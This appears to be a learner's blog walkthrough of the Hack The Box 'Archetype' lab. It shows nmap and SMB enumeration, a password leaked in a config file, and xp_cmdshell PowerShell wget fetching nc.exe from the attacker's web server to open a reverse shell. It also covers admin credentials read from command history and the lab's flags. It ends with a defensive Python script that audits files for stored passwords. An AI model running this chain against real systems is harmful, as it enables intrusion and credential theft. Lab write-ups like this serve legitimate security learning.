I recently started learning and reviewing networking and cyber security. I will be writing new blog posts showcasing my journey and my progress. In this post we go into Hack The Box and attempt to capture the flags on the Archetype box.


# Archetype

```
Target IP = 10.10.10.27
```

Nmap Scanning:-

Command:- `nmap -sC -sV -A 10.10.10.27`

Analysis of our scan:-

1) Open ports

```
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
```

SMB was detected:

```
Target Name: ARCHETYPE
Computer Name: ARCHETYPE
Account: guest
authen_level: user
```

2) SMB

```
    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    backups         Disk
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
```

We were able to access the backups SMB share.

Command:- `smbclient //10.10.10.27/backups`

We found a config file in the root of this share: prod.dtsconfig

3) Command:- `cat prod.dtsconfig`

```
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
```


We gained access to the MS SQL Server with the above creds.


Command:- `impacket-mssqlclient sql_svc:M3g4c0rp123@10.10.10.27 %TEMP%\nc.exe`

We uploaded nc.exe into the TEMP folder and ran it to execute a reverse shell.
On our machine we ran `python3 -m http.server` to host a web server so that nc.exe could be downloaded from the SQL server.

On the SQL server we used:

```
xp_cmdshell powershell wget http://$IP:8000/nc.exe -OutFile %TEMP%\nc.txt
```


Once the file was downloaded, we used the nc command to listen on port 1234.

On the SQL machine we then ran nc.exe to execute a reverse shell.


We now have access to a remote shell.

We found user.txt on the Desktop of the sql_svc user: 3e7b102e78218e935bf3f4951fec21a3

Privilege escalation

We checked the PowerShell history, which showed the command the previous user had used to log in as administrator:

```
type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
```

ADMINISTRATOR Account:
b91ccec3305e98240082d4474b848528
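
Both credentials on this box came from files at rest: the connection string in prod.dtsconfig and the `net.exe use` line in ConsoleHost_history.txt. As an added example (not part of the original walkthrough), this Python audit flags both patterns on constructed sample data; the function names, hosts and accounts are assumptions, and findings report the location and account but never the secret itself.

```python
import re
import xml.etree.ElementTree as ET

SECRET_KEYS = {"password", "pwd"}

# Constructed samples modelled on the two files above; every value is a placeholder.
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=EXAMPLE-ONLY;User ID=EXAMPLE\svc_account;Initial Catalog=Catalog;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\Package.Variables[User::BatchSize].Properties[Value]" ValueType="Int32">
    <ConfiguredValue>500</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""

SAMPLE_HISTORY = r"""Get-ChildItem C:\backups
net.exe use T: \\FILESRV\backups /user:administrator EXAMPLE-ONLY
net use U: \\FILESRV\share /user:auditor *
exit"""

def audit_dtsconfig(xml_text):
    """Return (property path, account) for each connection string that embeds a password."""
    findings = []
    for cfg in ET.fromstring(xml_text).iter("Configuration"):
        value = cfg.findtext("ConfiguredValue") or ""
        # A connection string is a ';'-separated list of key=value pairs.
        pairs = {k.strip().lower(): v.strip()
                 for k, _, v in (p.partition("=") for p in value.split(";") if "=" in p)}
        if pairs.keys() & SECRET_KEYS:
            findings.append((cfg.get("Path"), pairs.get("user id") or pairs.get("uid")))
    return findings

# Matches the form seen above: net use <drive> <share> /user:<account> <password>
NET_USE = re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(\S+)\s+(\S+)", re.IGNORECASE)

def audit_history(text):
    """Return (line number, account) where a password was typed after /user:."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = NET_USE.search(line)
        # '*' asks net use to prompt instead; a leading '/' is another switch.
        if m and m.group(2) != "*" and not m.group(2).startswith("/"):
            findings.append((lineno, m.group(1)))
    return findings

if __name__ == "__main__":
    print(audit_dtsconfig(SAMPLE_DTSCONFIG))
    print(audit_history(SAMPLE_HISTORY))
```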


